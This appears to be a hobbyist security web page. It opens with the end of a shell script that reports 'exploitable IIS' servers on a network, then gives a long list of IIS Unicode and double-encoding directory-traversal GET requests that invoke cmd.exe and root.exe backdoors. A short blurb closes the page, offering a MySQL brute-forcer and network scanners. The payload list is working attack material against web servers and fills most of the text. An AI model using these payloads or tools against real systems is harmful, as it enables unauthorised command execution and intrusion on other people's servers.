sum=`expr $sum + $g`
if [ $sum = 0 ]
    then 
	rm $2.exp
echo "
      No matches of Exploitable IIS
      In  >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "
	exit 1
    fi
echo "

      You can find a list of Exploitable IIS in >> $2.exp << 
      and in >> $2 <<  you can find the IIS in this network

      Thanks for use ... 
      "

an old list of Unicodes
unicodes.txt

GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
GET /msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir
GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
GET /scripts/root.exe?/c+dir
GET /msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir

 

Home

Hello and Welcome to bastardo.de

i have changed the design a little bit to a blog, it is easier to maintainace.

How ever 😉 you can find here Sourcecodes and maybe some Information’s in the future about some little scripts i wrote also some tips for Administration
Hope you enjoy this site and have fun with my programs, if you find a code error don’t hesitate and write a comment.

At the moment i will list
MySQL Bruteforce for Linux and Windows
IISscan for Linux (Written in early 2000 for testing purposes )
SmbScan for Linux (Samba/Netbios scanner for large networks, to find free shares in the local network)

you can find also informations about programming on my partner Site http://code-reference.com
a library about Programming